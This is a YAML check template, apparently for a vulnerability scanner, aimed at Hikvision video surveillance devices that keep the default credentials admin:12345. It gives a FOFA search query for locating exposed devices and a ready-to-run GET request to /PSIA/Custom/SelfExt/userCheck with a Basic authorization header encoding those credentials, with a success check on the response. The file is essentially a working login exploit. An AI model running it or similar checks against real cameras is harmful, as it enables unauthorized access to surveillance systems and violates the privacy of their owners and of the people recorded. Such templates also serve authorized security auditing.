product: 海康威视视频监控
vName: 海康威视视频监控 弱口令
type: 默认口令/弱口令
vID: [ ]
level: 3
vDesc: 海康威视视频监控存在弱口令 admin:12345
version: ''
note: ''
search:
  FOFA: app="HIKVISION-视频监控"
protocol: http
link: ''
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /PSIA/Custom/SelfExt/userCheck
      header:
        Authorization: Basic YWRtaW46MTIzNDU=
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - OK
            logic: and
          header:
            value:
              - application/xml
            logic: and